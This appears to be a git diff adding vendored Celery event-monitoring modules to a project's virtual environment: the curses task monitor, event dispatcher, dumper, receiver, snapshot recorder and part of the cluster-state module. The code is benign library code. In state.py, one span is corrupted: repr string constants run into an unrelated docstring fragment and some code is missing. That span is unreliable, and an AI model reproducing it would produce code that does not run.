+ + def selection_info(self): + if not self.selected_task: + return + + def alert_callback(mx, my, xs): + my, mx = self.win.getmaxyx() + y = count(xs) + task = self.state.tasks[self.selected_task] + info = task.info(extra=['state']) + infoitems = [ + ('args', info.pop('args', None)), + ('kwargs', info.pop('kwargs', None)) + ] + list(info.items()) + for key, value in infoitems: + if key is None: + continue + value = str(value) + curline = next(y) + keys = key + ': ' + self.win.addstr(curline, 3, keys, curses.A_BOLD) + wrapped = wrap(value, mx - 2) + if len(wrapped) == 1: + self.win.addstr( + curline, len(keys) + 3, + abbr(wrapped[0], + self.screen_width - (len(keys) + 3))) + else: + for subline in wrapped: + nexty = next(y) + if nexty >= my - 1: + subline = ' ' * 4 + '[...]' + self.win.addstr( + nexty, 3, + abbr(' ' * 4 + subline, self.screen_width - 4), + curses.A_NORMAL, + ) + + return self.alert( + alert_callback, f'Task details for {self.selected_task}', + ) + + def selection_traceback(self): + if not self.selected_task: + return curses.beep() + task = self.state.tasks[self.selected_task] + if task.state not in states.EXCEPTION_STATES: + return curses.beep() + + def alert_callback(my, mx, xs): + y = count(xs) + for line in task.traceback.split('\n'): + self.win.addstr(next(y), 3, line) + + return self.alert( + alert_callback, + f'Task Exception Traceback for {self.selected_task}', + ) + + def selection_result(self): + if not self.selected_task: + return + + def alert_callback(my, mx, xs): + y = count(xs) + task = self.state.tasks[self.selected_task] + result = (getattr(task, 'result', None) or + getattr(task, 'exception', None)) + for line in wrap(result or '', mx - 2): + 
self.win.addstr(next(y), 3, line) + + return self.alert( + alert_callback, + f'Task Result for {self.selected_task}', + ) + + def display_task_row(self, lineno, task): + state_color = self.state_colors.get(task.state) + attr = curses.A_NORMAL + if task.uuid == self.selected_task: + attr = curses.A_STANDOUT + timestamp = datetime.utcfromtimestamp( + task.timestamp or time(), + ) + timef = timestamp.strftime('%H:%M:%S') + hostname = task.worker.hostname if task.worker else '*NONE*' + line = self.format_row(task.uuid, task.name, + hostname, + timef, task.state) + self.win.addstr(lineno, LEFT_BORDER_OFFSET, line, attr) + + if state_color: + self.win.addstr(lineno, + len(line) - STATE_WIDTH + BORDER_SPACING - 1, + task.state, state_color | attr) + + def draw(self): + with self.lock: + win = self.win + self.handle_keypress() + x = LEFT_BORDER_OFFSET + y = blank_line = count(2) + my, _ = win.getmaxyx() + win.erase() + win.bkgd(' ', curses.color_pair(1)) + win.border() + win.addstr(1, x, self.greet, curses.A_DIM | curses.color_pair(5)) + next(blank_line) + win.addstr(next(y), x, self.format_row('UUID', 'TASK', + 'WORKER', 'TIME', 'STATE'), + curses.A_BOLD | curses.A_UNDERLINE) + tasks = self.tasks + if tasks: + for row, (_, task) in enumerate(tasks): + if row > self.display_height: + break + + if task.uuid: + lineno = next(y) + self.display_task_row(lineno, task) + + # -- Footer + next(blank_line) + win.hline(my - 6, x, curses.ACS_HLINE, self.screen_width - 4) + + # Selected Task Info + if self.selected_task: + win.addstr(my - 5, x, self.selected_str, curses.A_BOLD) + info = 'Missing extended info' + detail = '' + try: + selection = self.state.tasks[self.selected_task] + except KeyError: + pass + else: + info = selection.info() + if 'runtime' in info: + info['runtime'] = '{:.2f}'.format(info['runtime']) + if 'result' in info: + info['result'] = abbr(info['result'], 16) + info = ' '.join( + f'{key}={value}' + for key, value in info.items() + ) + detail = '... 
-> key i' + infowin = abbr(info, + self.screen_width - len(self.selected_str) - 2, + detail) + win.addstr(my - 5, x + len(self.selected_str), infowin) + # Make ellipsis bold + if detail in infowin: + detailpos = len(infowin) - len(detail) + win.addstr(my - 5, x + len(self.selected_str) + detailpos, + detail, curses.A_BOLD) + else: + win.addstr(my - 5, x, 'No task selected', curses.A_NORMAL) + + # Workers + if self.workers: + win.addstr(my - 4, x, self.online_str, curses.A_BOLD) + win.addstr(my - 4, x + len(self.online_str), + ', '.join(sorted(self.workers)), curses.A_NORMAL) + else: + win.addstr(my - 4, x, 'No workers discovered.') + + # Info + win.addstr(my - 3, x, self.info_str, curses.A_BOLD) + win.addstr( + my - 3, x + len(self.info_str), + STATUS_SCREEN.format( + s=self.state, + w_alive=len([w for w in self.state.workers.values() + if w.alive]), + w_all=len(self.state.workers), + ), + curses.A_DIM, + ) + + # Help + self.safe_add_str(my - 2, x, self.help_title, curses.A_BOLD) + self.safe_add_str(my - 2, x + len(self.help_title), self.help, + curses.A_DIM) + win.refresh() + + def safe_add_str(self, y, x, string, *args, **kwargs): + if x + len(string) > self.screen_width: + string = string[:self.screen_width - x] + self.win.addstr(y, x, string, *args, **kwargs) + + def init_screen(self): + with self.lock: + self.win = curses.initscr() + self.win.nodelay(True) + self.win.keypad(True) + curses.start_color() + curses.init_pair(1, self.foreground, self.background) + # exception states + curses.init_pair(2, curses.COLOR_RED, self.background) + # successful state + curses.init_pair(3, curses.COLOR_GREEN, self.background) + # revoked state + curses.init_pair(4, curses.COLOR_MAGENTA, self.background) + # greeting + curses.init_pair(5, curses.COLOR_BLUE, self.background) + # started state + curses.init_pair(6, curses.COLOR_YELLOW, self.foreground) + + self.state_colors = {states.SUCCESS: curses.color_pair(3), + states.REVOKED: curses.color_pair(4), + states.STARTED: curses.color_pair(6)} + for state in states.EXCEPTION_STATES: + self.state_colors[state] = curses.color_pair(2) + + curses.cbreak() + + def resetscreen(self): + with self.lock: + curses.nocbreak() + self.win.keypad(False) + curses.echo() + curses.endwin() + + def nap(self): + curses.napms(self.screen_delay) + + @property + def tasks(self): + return list(self.state.tasks_by_time(limit=self.limit)) + + @property + def workers(self): + return [hostname for hostname, w in self.state.workers.items() + if w.alive] + + +class DisplayThread(threading.Thread): # pragma: no cover + + def __init__(self, display): + self.display = display + self.shutdown = False + super().__init__() + + def run(self): + while not self.shutdown: + self.display.draw() + self.display.nap() + + +def capture_events(app, state, display): # pragma: no cover + + def on_connection_error(exc, interval): + print('Connection Error: {!r}. 
Retry in {}s.'.format( + exc, interval), file=sys.stderr) + + while 1: + print('-> evtop: starting capture...', file=sys.stderr) + with app.connection_for_read() as conn: + try: + conn.ensure_connection(on_connection_error, + app.conf.broker_connection_max_retries) + recv = app.events.Receiver(conn, handlers={'*': state.event}) + display.resetscreen() + display.init_screen() + recv.capture() + except conn.connection_errors + conn.channel_errors as exc: + print(f'Connection lost: {exc!r}', file=sys.stderr) + + +def evtop(app=None): # pragma: no cover + """Start curses monitor.""" + app = app_or_default(app) + state = app.events.State() + display = CursesMonitor(state, app) + display.init_screen() + refresher = DisplayThread(display) + refresher.start() + try: + capture_events(app, state, display) + except Exception: + refresher.shutdown = True + refresher.join() + display.resetscreen() + raise + except (KeyboardInterrupt, SystemExit): + refresher.shutdown = True + refresher.join() + display.resetscreen() + + +if __name__ == '__main__': # pragma: no cover + evtop() diff --git a/env/Lib/site-packages/celery/events/dispatcher.py b/env/Lib/site-packages/celery/events/dispatcher.py new file mode 100644 index 00000000..1969fc21 --- /dev/null +++ b/env/Lib/site-packages/celery/events/dispatcher.py @@ -0,0 +1,229 @@ +"""Event dispatcher sends events.""" + +import os +import threading +import time +from collections import defaultdict, deque + +from kombu import Producer + +from celery.app import app_or_default +from celery.utils.nodenames import anon_nodename +from celery.utils.time import utcoffset + +from .event import Event, get_exchange, group_from + +__all__ = ('EventDispatcher',) + + +class EventDispatcher: + """Dispatches event messages. + + Arguments: + connection (kombu.Connection): Connection to the broker. + + hostname (str): Hostname to identify ourselves as, + by default uses the hostname returned by + :func:`~celery.utils.anon_nodename`. + + groups (Sequence[str]): List of groups to send events for. + :meth:`send` will ignore send requests to groups not in this list. + If this is :const:`None`, all events will be sent. + Example groups include ``"task"`` and ``"worker"``. + + enabled (bool): Set to :const:`False` to not actually publish any + events, making :meth:`send` a no-op. + + channel (kombu.Channel): Can be used instead of `connection` to specify + an exact channel to use when sending events. + + buffer_while_offline (bool): If enabled events will be buffered + while the connection is down. :meth:`flush` must be called + as soon as the connection is re-established. + + Note: + You need to :meth:`close` this after use. + """ + + DISABLED_TRANSPORTS = {'sql'} + + app = None + + # set of callbacks to be called when :meth:`enabled`. + on_enabled = None + + # set of callbacks to be called when :meth:`disabled`. 
+ on_disabled = None + + def __init__(self, connection=None, hostname=None, enabled=True, + channel=None, buffer_while_offline=True, app=None, + serializer=None, groups=None, delivery_mode=1, + buffer_group=None, buffer_limit=24, on_send_buffered=None): + self.app = app_or_default(app or self.app) + self.connection = connection + self.channel = channel + self.hostname = hostname or anon_nodename() + self.buffer_while_offline = buffer_while_offline + self.buffer_group = buffer_group or frozenset() + self.buffer_limit = buffer_limit + self.on_send_buffered = on_send_buffered + self._group_buffer = defaultdict(list) + self.mutex = threading.Lock() + self.producer = None + self._outbound_buffer = deque() + self.serializer = serializer or self.app.conf.event_serializer + self.on_enabled = set() + self.on_disabled = set() + self.groups = set(groups or []) + self.tzoffset = [-time.timezone, -time.altzone] + self.clock = self.app.clock + self.delivery_mode = delivery_mode + if not connection and channel: + self.connection = channel.connection.client + self.enabled = enabled + conninfo = self.connection or self.app.connection_for_write() + self.exchange = get_exchange(conninfo, + name=self.app.conf.event_exchange) + if conninfo.transport.driver_type in self.DISABLED_TRANSPORTS: + self.enabled = False + if self.enabled: + self.enable() + self.headers = {'hostname': self.hostname} + self.pid = os.getpid() + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def enable(self): + self.producer = Producer(self.channel or self.connection, + exchange=self.exchange, + serializer=self.serializer, + auto_declare=False) + self.enabled = True + for callback in self.on_enabled: + callback() + + def disable(self): + if self.enabled: + self.enabled = False + self.close() + for callback in self.on_disabled: + callback() + + def publish(self, type, fields, producer, + blind=False, Event=Event, **kwargs): + """Publish event using custom :class:`~kombu.Producer`. + + Arguments: + type (str): Event type name, with group separated by dash (`-`). + fields: Dictionary of event fields, must be json serializable. + producer (kombu.Producer): Producer instance to use: + only the ``publish`` method will be called. + retry (bool): Retry in the event of connection failure. + retry_policy (Mapping): Map of custom retry policy options. + See :meth:`~kombu.Connection.ensure`. + blind (bool): Don't set logical clock value (also don't forward + the internal logical clock). + Event (Callable): Event type used to create event. + Defaults to :func:`Event`. + utcoffset (Callable): Function returning the current + utc offset in hours. 
+ """ + clock = None if blind else self.clock.forward() + event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), + pid=self.pid, clock=clock, **fields) + with self.mutex: + return self._publish(event, producer, + routing_key=type.replace('-', '.'), **kwargs) + + def _publish(self, event, producer, routing_key, retry=False, + retry_policy=None, utcoffset=utcoffset): + exchange = self.exchange + try: + producer.publish( + event, + routing_key=routing_key, + exchange=exchange.name, + retry=retry, + retry_policy=retry_policy, + declare=[exchange], + serializer=self.serializer, + headers=self.headers, + delivery_mode=self.delivery_mode, + ) + except Exception as exc: # pylint: disable=broad-except + if not self.buffer_while_offline: + raise + self._outbound_buffer.append((event, routing_key, exc)) + + def send(self, type, blind=False, utcoffset=utcoffset, retry=False, + retry_policy=None, Event=Event, **fields): + """Send event. + + Arguments: + type (str): Event type name, with group separated by dash (`-`). + retry (bool): Retry in the event of connection failure. + retry_policy (Mapping): Map of custom retry policy options. + See :meth:`~kombu.Connection.ensure`. + blind (bool): Don't set logical clock value (also don't forward + the internal logical clock). + Event (Callable): Event type used to create event, + defaults to :func:`Event`. + utcoffset (Callable): unction returning the current utc offset + in hours. + **fields (Any): Event fields -- must be json serializable. + """ + if self.enabled: + groups, group = self.groups, group_from(type) + if groups and group not in groups: + return + if group in self.buffer_group: + clock = self.clock.forward() + event = Event(type, hostname=self.hostname, + utcoffset=utcoffset(), + pid=self.pid, clock=clock, **fields) + buf = self._group_buffer[group] + buf.append(event) + if len(buf) >= self.buffer_limit: + self.flush() + elif self.on_send_buffered: + self.on_send_buffered() + else: + return self.publish(type, fields, self.producer, blind=blind, + Event=Event, retry=retry, + retry_policy=retry_policy) + + def flush(self, errors=True, groups=True): + """Flush the outbound buffer.""" + if errors: + buf = list(self._outbound_buffer) + try: + with self.mutex: + for event, routing_key, _ in buf: + self._publish(event, self.producer, routing_key) + finally: + self._outbound_buffer.clear() + if groups: + with self.mutex: + for group, events in self._group_buffer.items(): + self._publish(events, self.producer, '%s.multi' % group) + events[:] = [] # list.clear + + def extend_buffer(self, other): + """Copy the outbound buffer of another instance.""" + self._outbound_buffer.extend(other._outbound_buffer) + + def close(self): + """Close the event dispatcher.""" + self.mutex.locked() and self.mutex.release() + self.producer = None + + def _get_publisher(self): + return self.producer + + def _set_publisher(self, producer): + self.producer = producer + publisher = property(_get_publisher, _set_publisher) # XXX compat diff --git a/env/Lib/site-packages/celery/events/dumper.py b/env/Lib/site-packages/celery/events/dumper.py new file mode 100644 index 00000000..24c7b3e9 --- /dev/null +++ b/env/Lib/site-packages/celery/events/dumper.py @@ -0,0 +1,103 @@ +"""Utility to dump events to screen. + +This is a simple program that dumps events to the console +as they happen. Think of it like a `tcpdump` for Celery events. 
+""" +import sys +from datetime import datetime + +from celery.app import app_or_default +from celery.utils.functional import LRUCache +from celery.utils.time import humanize_seconds + +__all__ = ('Dumper', 'evdump') + +TASK_NAMES = LRUCache(limit=0xFFF) + +HUMAN_TYPES = { + 'worker-offline': 'shutdown', + 'worker-online': 'started', + 'worker-heartbeat': 'heartbeat', +} + +CONNECTION_ERROR = """\ +-> Cannot connect to %s: %s. +Trying again %s +""" + + +def humanize_type(type): + try: + return HUMAN_TYPES[type.lower()] + except KeyError: + return type.lower().replace('-', ' ') + + +class Dumper: + """Monitor events.""" + + def __init__(self, out=sys.stdout): + self.out = out + + def say(self, msg): + print(msg, file=self.out) + # need to flush so that output can be piped. + try: + self.out.flush() + except AttributeError: # pragma: no cover + pass + + def on_event(self, ev): + timestamp = datetime.utcfromtimestamp(ev.pop('timestamp')) + type = ev.pop('type').lower() + hostname = ev.pop('hostname') + if type.startswith('task-'): + uuid = ev.pop('uuid') + if type in ('task-received', 'task-sent'): + task = TASK_NAMES[uuid] = '{}({}) args={} kwargs={}' \ + .format(ev.pop('name'), uuid, + ev.pop('args'), + ev.pop('kwargs')) + else: + task = TASK_NAMES.get(uuid, '') + return self.format_task_event(hostname, timestamp, + type, task, ev) + fields = ', '.join( + f'{key}={ev[key]}' for key in sorted(ev) + ) + sep = fields and ':' or '' + self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {fields}') + + def format_task_event(self, hostname, timestamp, type, task, event): + fields = ', '.join( + f'{key}={event[key]}' for key in sorted(event) + ) + sep = fields and ':' or '' + self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {task} {fields}') + + +def evdump(app=None, out=sys.stdout): + """Start event dump.""" + app = app_or_default(app) + dumper = Dumper(out=out) + dumper.say('-> evdump: starting capture...') + conn = app.connection_for_read().clone() + + def _error_handler(exc, interval): + dumper.say(CONNECTION_ERROR % ( + conn.as_uri(), exc, humanize_seconds(interval, 'in', ' ') + )) + + while 1: + try: + conn.ensure_connection(_error_handler) + recv = app.events.Receiver(conn, handlers={'*': dumper.on_event}) + recv.capture() + except (KeyboardInterrupt, SystemExit): + return conn and conn.close() + except conn.connection_errors + conn.channel_errors: + dumper.say('-> Connection lost, attempting reconnect') + + +if __name__ == '__main__': # pragma: no cover + evdump() diff --git a/env/Lib/site-packages/celery/events/event.py b/env/Lib/site-packages/celery/events/event.py new file mode 100644 index 00000000..a05ed707 --- /dev/null +++ b/env/Lib/site-packages/celery/events/event.py @@ -0,0 +1,63 @@ +"""Creating events, and event exchange definition.""" +import time +from copy import copy + +from kombu import Exchange + +__all__ = ( + 'Event', 'event_exchange', 'get_exchange', 'group_from', +) + +EVENT_EXCHANGE_NAME = 'celeryev' +#: Exchange used to send events on. +#: Note: Use :func:`get_exchange` instead, as the type of +#: exchange will vary depending on the broker connection. +event_exchange = Exchange(EVENT_EXCHANGE_NAME, type='topic') + + +def Event(type, _fields=None, __dict__=dict, __now__=time.time, **fields): + """Create an event. + + Notes: + An event is simply a dictionary: the only required field is ``type``. + A ``timestamp`` field will be set to the current time if not provided. 
+ """ + event = __dict__(_fields, **fields) if _fields else fields + if 'timestamp' not in event: + event.update(timestamp=__now__(), type=type) + else: + event['type'] = type + return event + + +def group_from(type): + """Get the group part of an event type name. + + Example: + >>> group_from('task-sent') + 'task' + + >>> group_from('custom-my-event') + 'custom' + """ + return type.split('-', 1)[0] + + +def get_exchange(conn, name=EVENT_EXCHANGE_NAME): + """Get exchange used for sending events. + + Arguments: + conn (kombu.Connection): Connection used for sending/receiving events. + name (str): Name of the exchange. Default is ``celeryev``. + + Note: + The event type changes if Redis is used as the transport + (from topic -> fanout). + """ + ex = copy(event_exchange) + if conn.transport.driver_type == 'redis': + # quick hack for Issue #436 + ex.type = 'fanout' + if name != ex.name: + ex.name = name + return ex diff --git a/env/Lib/site-packages/celery/events/receiver.py b/env/Lib/site-packages/celery/events/receiver.py new file mode 100644 index 00000000..14871073 --- /dev/null +++ b/env/Lib/site-packages/celery/events/receiver.py @@ -0,0 +1,135 @@ +"""Event receiver implementation.""" +import time +from operator import itemgetter + +from kombu import Queue +from kombu.connection import maybe_channel +from kombu.mixins import ConsumerMixin + +from celery import uuid +from celery.app import app_or_default +from celery.utils.time import adjust_timestamp + +from .event import get_exchange + +__all__ = ('EventReceiver',) + +CLIENT_CLOCK_SKEW = -1 + +_TZGETTER = itemgetter('utcoffset', 'timestamp') + + +class EventReceiver(ConsumerMixin): + """Capture events. + + Arguments: + connection (kombu.Connection): Connection to the broker. + handlers (Mapping[Callable]): Event handlers. + This is a map of event type names and their handlers. + The special handler `"*"` captures all events that don't have a + handler. 
+ """ + + app = None + + def __init__(self, channel, handlers=None, routing_key='#', + node_id=None, app=None, queue_prefix=None, + accept=None, queue_ttl=None, queue_expires=None): + self.app = app_or_default(app or self.app) + self.channel = maybe_channel(channel) + self.handlers = {} if handlers is None else handlers + self.routing_key = routing_key + self.node_id = node_id or uuid() + self.queue_prefix = queue_prefix or self.app.conf.event_queue_prefix + self.exchange = get_exchange( + self.connection or self.app.connection_for_write(), + name=self.app.conf.event_exchange) + if queue_ttl is None: + queue_ttl = self.app.conf.event_queue_ttl + if queue_expires is None: + queue_expires = self.app.conf.event_queue_expires + self.queue = Queue( + '.'.join([self.queue_prefix, self.node_id]), + exchange=self.exchange, + routing_key=self.routing_key, + auto_delete=True, durable=False, + message_ttl=queue_ttl, + expires=queue_expires, + ) + self.clock = self.app.clock + self.adjust_clock = self.clock.adjust + self.forward_clock = self.clock.forward + if accept is None: + accept = {self.app.conf.event_serializer, 'json'} + self.accept = accept + + def process(self, type, event): + """Process event by dispatching to configured handler.""" + handler = self.handlers.get(type) or self.handlers.get('*') + handler and handler(event) + + def get_consumers(self, Consumer, channel): + return [Consumer(queues=[self.queue], + callbacks=[self._receive], no_ack=True, + accept=self.accept)] + + def on_consume_ready(self, connection, channel, consumers, + wakeup=True, **kwargs): + if wakeup: + self.wakeup_workers(channel=channel) + + def itercapture(self, limit=None, timeout=None, wakeup=True): + return self.consume(limit=limit, timeout=timeout, wakeup=wakeup) + + def capture(self, limit=None, timeout=None, wakeup=True): + """Open up a consumer capturing events. + + This has to run in the main process, and it will never stop + unless :attr:`EventDispatcher.should_stop` is set to True, or + forced via :exc:`KeyboardInterrupt` or :exc:`SystemExit`. 
+ """ + for _ in self.consume(limit=limit, timeout=timeout, wakeup=wakeup): + pass + + def wakeup_workers(self, channel=None): + self.app.control.broadcast('heartbeat', + connection=self.connection, + channel=channel) + + def event_from_message(self, body, localize=True, + now=time.time, tzfields=_TZGETTER, + adjust_timestamp=adjust_timestamp, + CLIENT_CLOCK_SKEW=CLIENT_CLOCK_SKEW): + type = body['type'] + if type == 'task-sent': + # clients never sync so cannot use their clock value + _c = body['clock'] = (self.clock.value or 1) + CLIENT_CLOCK_SKEW + self.adjust_clock(_c) + else: + try: + clock = body['clock'] + except KeyError: + body['clock'] = self.forward_clock() + else: + self.adjust_clock(clock) + + if localize: + try: + offset, timestamp = tzfields(body) + except KeyError: + pass + else: + body['timestamp'] = adjust_timestamp(timestamp, offset) + body['local_received'] = now() + return type, body + + def _receive(self, body, message, list=list, isinstance=isinstance): + if isinstance(body, list): # celery 4.0+: List of events + process, from_message = self.process, self.event_from_message + [process(*from_message(event)) for event in body] + else: + self.process(*self.event_from_message(body)) + + @property + def connection(self): + return self.channel.connection.client if self.channel else None diff --git a/env/Lib/site-packages/celery/events/snapshot.py b/env/Lib/site-packages/celery/events/snapshot.py new file mode 100644 index 00000000..d4dd65b1 --- /dev/null +++ b/env/Lib/site-packages/celery/events/snapshot.py @@ -0,0 +1,111 @@ +"""Periodically store events in a database. + +Consuming the events as a stream isn't always suitable +so this module implements a system to take snapshots of the +state of a cluster at regular intervals. There's a full +implementation of this writing the snapshots to a database +in :mod:`djcelery.snapshots` in the `django-celery` distribution. 
+""" +from kombu.utils.limits import TokenBucket + +from celery import platforms +from celery.app import app_or_default +from celery.utils.dispatch import Signal +from celery.utils.imports import instantiate +from celery.utils.log import get_logger +from celery.utils.time import rate +from celery.utils.timer2 import Timer + +__all__ = ('Polaroid', 'evcam') + +logger = get_logger('celery.evcam') + + +class Polaroid: + """Record event snapshots.""" + + timer = None + shutter_signal = Signal(name='shutter_signal', providing_args={'state'}) + cleanup_signal = Signal(name='cleanup_signal') + clear_after = False + + _tref = None + _ctref = None + + def __init__(self, state, freq=1.0, maxrate=None, + cleanup_freq=3600.0, timer=None, app=None): + self.app = app_or_default(app) + self.state = state + self.freq = freq + self.cleanup_freq = cleanup_freq + self.timer = timer or self.timer or Timer() + self.logger = logger + self.maxrate = maxrate and TokenBucket(rate(maxrate)) + + def install(self): + self._tref = self.timer.call_repeatedly(self.freq, self.capture) + self._ctref = self.timer.call_repeatedly( + self.cleanup_freq, self.cleanup, + ) + + def on_shutter(self, state): + pass + + def on_cleanup(self): + pass + + def cleanup(self): + logger.debug('Cleanup: Running...') + self.cleanup_signal.send(sender=self.state) + self.on_cleanup() + + def shutter(self): + if self.maxrate is None or self.maxrate.can_consume(): + logger.debug('Shutter: %s', self.state) + self.shutter_signal.send(sender=self.state) + self.on_shutter(self.state) + + def capture(self): + self.state.freeze_while(self.shutter, clear_after=self.clear_after) + + def cancel(self): + if self._tref: + self._tref() # flush all received events. + self._tref.cancel() + if self._ctref: + self._ctref.cancel() + + def __enter__(self): + self.install() + return self + + def __exit__(self, *exc_info): + self.cancel() + + +def evcam(camera, freq=1.0, maxrate=None, loglevel=0, + logfile=None, pidfile=None, timer=None, app=None, + **kwargs): + """Start snapshot recorder.""" + app = app_or_default(app) + + if pidfile: + platforms.create_pidlock(pidfile) + + app.log.setup_logging_subsystem(loglevel, logfile) + + print(f'-> evcam: Taking snapshots with {camera} (every {freq} secs.)') + state = app.events.State() + cam = instantiate(camera, state, app=app, freq=freq, + maxrate=maxrate, timer=timer) + cam.install() + conn = app.connection_for_read() + recv = app.events.Receiver(conn, handlers={'*': state.event}) + try: + try: + recv.capture(limit=None) + except KeyboardInterrupt: + raise SystemExit + finally: + cam.cancel() + conn.close() diff --git a/env/Lib/site-packages/celery/events/state.py b/env/Lib/site-packages/celery/events/state.py new file mode 100644 index 00000000..34499913 --- /dev/null +++ b/env/Lib/site-packages/celery/events/state.py @@ -0,0 +1,730 @@ +"""In-memory representation of cluster state. + +This module implements a data-structure used to keep +track of the state of a cluster of workers and the tasks +it is working on (by consuming events). + +For every event consumed the state is updated, +so the state represents the state of the cluster +at the time of the last event. + +Snapshots (:mod:`celery.events.snapshot`) can be used to +take "pictures" of this state at regular intervals +to for example, store that in a database. 
+""" +import bisect +import sys +import threading +from collections import defaultdict +from collections.abc import Callable +from datetime import datetime +from decimal import Decimal +from itertools import islice +from operator import itemgetter +from time import time +from typing import Mapping, Optional # noqa +from weakref import WeakSet, ref + +from kombu.clocks import timetuple +from kombu.utils.objects import cached_property + +from celery import states +from celery.utils.functional import LRUCache, memoize, pass1 +from celery.utils.log import get_logger + +__all__ = ('Worker', 'Task', 'State', 'heartbeat_expires') + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. +# pylint: disable=too-many-function-args +# For some reason pylint thinks ._event is a method, when it's a property. + +#: Set if running PyPy +PYPY = hasattr(sys, 'pypy_version_info') + +#: The window (in percentage) is added to the workers heartbeat +#: frequency. If the time between updates exceeds this window, +#: then the worker is considered to be offline. +HEARTBEAT_EXPIRE_WINDOW = 200 + +#: Max drift between event timestamp and time of event received +#: before we alert that clocks may be unsynchronized. +HEARTBEAT_DRIFT_MAX = 16 + +DRIFT_WARNING = ( + "Substantial drift from %s may mean clocks are out of sync. Current drift is " + "%s seconds. [orig: %s recv: %s]" +) + +logger = get_logger(__name__) +warn = logger.warning + +R_STATE = '' +R_WORKER = '>> add_tasks = state.tasks_by_type['proj.tasks.add'] + + while still supporting the method call:: + + >>> add_tasks = list(state.tasks_by_type( + ... 'proj.tasks.add', reverse=True)) + """ + + def __init__(self, fun, *args, **kwargs): + self.fun = fun + super().__init__(*args, **kwargs) + + def __call__(self, *args, **kwargs): + return self.fun(*args, **kwargs) + + +Callable.register(CallableDefaultdict) + + +@memoize(maxsize=1000, keyfun=lambda a, _: a[0]) +def _warn_drift(hostname, drift, local_received, timestamp): + # we use memoize here so the warning is only logged once per hostname + warn(DRIFT_WARNING, hostname, drift, + datetime.fromtimestamp(local_received), + datetime.fromtimestamp(timestamp)) + + +def heartbeat_expires(timestamp, freq=60, + expire_window=HEARTBEAT_EXPIRE_WINDOW, + Decimal=Decimal, float=float, isinstance=isinstance): + """Return time when heartbeat expires.""" + # some json implementations returns decimal.Decimal objects, + # which aren't compatible with float. 
+ freq = float(freq) if isinstance(freq, Decimal) else freq + if isinstance(timestamp, Decimal): + timestamp = float(timestamp) + return timestamp + (freq * (expire_window / 1e2)) + + +def _depickle_task(cls, fields): + return cls(**fields) + + +def with_unique_field(attr): + + def _decorate_cls(cls): + + def __eq__(this, other): + if isinstance(other, this.__class__): + return getattr(this, attr) == getattr(other, attr) + return NotImplemented + cls.__eq__ = __eq__ + + def __hash__(this): + return hash(getattr(this, attr)) + cls.__hash__ = __hash__ + + return cls + return _decorate_cls + + +@with_unique_field('hostname') +class Worker: + """Worker State.""" + + heartbeat_max = 4 + expire_window = HEARTBEAT_EXPIRE_WINDOW + + _fields = ('hostname', 'pid', 'freq', 'heartbeats', 'clock', + 'active', 'processed', 'loadavg', 'sw_ident', + 'sw_ver', 'sw_sys') + if not PYPY: # pragma: no cover + __slots__ = _fields + ('event', '__dict__', '__weakref__') + + def __init__(self, hostname=None, pid=None, freq=60, + heartbeats=None, clock=0, active=None, processed=None, + loadavg=None, sw_ident=None, sw_ver=None, sw_sys=None): + self.hostname = hostname + self.pid = pid + self.freq = freq + self.heartbeats = [] if heartbeats is None else heartbeats + self.clock = clock or 0 + self.active = active + self.processed = processed + self.loadavg = loadavg + self.sw_ident = sw_ident + self.sw_ver = sw_ver + self.sw_sys = sw_sys + self.event = self._create_event_handler() + + def __reduce__(self): + return self.__class__, (self.hostname, self.pid, self.freq, + self.heartbeats, self.clock, self.active, + self.processed, self.loadavg, self.sw_ident, + self.sw_ver, self.sw_sys) + + def _create_event_handler(self): + _set = object.__setattr__ + hbmax = self.heartbeat_max + heartbeats = self.heartbeats + hb_pop = self.heartbeats.pop + hb_append = self.heartbeats.append + + def event(type_, timestamp=None, + local_received=None, fields=None, + max_drift=HEARTBEAT_DRIFT_MAX, abs=abs, int=int, + insort=bisect.insort, len=len): + fields = fields or {} + for k, v in fields.items(): + _set(self, k, v) + if type_ == 'offline': + heartbeats[:] = [] + else: + if not local_received or not timestamp: + return + drift = abs(int(local_received) - int(timestamp)) + if drift > max_drift: + _warn_drift(self.hostname, drift, + local_received, timestamp) + if local_received: # pragma: no cover + hearts = len(heartbeats) + if hearts > hbmax - 1: + hb_pop(0) + if hearts and local_received > heartbeats[-1]: + hb_append(local_received) + else: + insort(heartbeats, local_received) + return event + + def update(self, f, **kw): + d = dict(f, **kw) if kw else f + for k, v in d.items(): + setattr(self, k, v) + + def __repr__(self): + return R_WORKER.format(self) + + @property + def status_string(self): + return 'ONLINE' if self.alive else 'OFFLINE' + + @property + def heartbeat_expires(self): + return heartbeat_expires(self.heartbeats[-1], + self.freq, self.expire_window) + + @property + def alive(self, nowfun=time): + return bool(self.heartbeats and nowfun() < self.heartbeat_expires) + + @property + def id(self): + return '{0.hostname}.{0.pid}'.format(self) + + +@with_unique_field('uuid') +class Task: + """Task State.""" + + name = received = sent = started = succeeded = failed = retried = \ + revoked = rejected = args = kwargs = eta = expires = retries = \ + worker = result = exception = timestamp = runtime = traceback = \ + exchange = routing_key = root_id = parent_id = client = None + state = states.PENDING + clock = 0 + + _fields = ( + 
'uuid', 'name', 'state', 'received', 'sent', 'started', 'rejected', + 'succeeded', 'failed', 'retried', 'revoked', 'args', 'kwargs', + 'eta', 'expires', 'retries', 'worker', 'result', 'exception', + 'timestamp', 'runtime', 'traceback', 'exchange', 'routing_key', + 'clock', 'client', 'root', 'root_id', 'parent', 'parent_id', + 'children', + ) + if not PYPY: # pragma: no cover + __slots__ = ('__dict__', '__weakref__') + + #: How to merge out of order events. + #: Disorder is detected by logical ordering (e.g., :event:`task-received` + #: must've happened before a :event:`task-failed` event). + #: + #: A merge rule consists of a state and a list of fields to keep from + #: that state. ``(RECEIVED, ('name', 'args')``, means the name and args + #: fields are always taken from the RECEIVED state, and any values for + #: these fields received before or after is simply ignored. + merge_rules = { + states.RECEIVED: ( + 'name', 'args', 'kwargs', 'parent_id', + 'root_id', 'retries', 'eta', 'expires', + ), + } + + #: meth:`info` displays these fields by default. + _info_fields = ( + 'args', 'kwargs', 'retries', 'result', 'eta', 'runtime', + 'expires', 'exception', 'exchange', 'routing_key', + 'root_id', 'parent_id', + ) + + def __init__(self, uuid=None, cluster_state=None, children=None, **kwargs): + self.uuid = uuid + self.cluster_state = cluster_state + if self.cluster_state is not 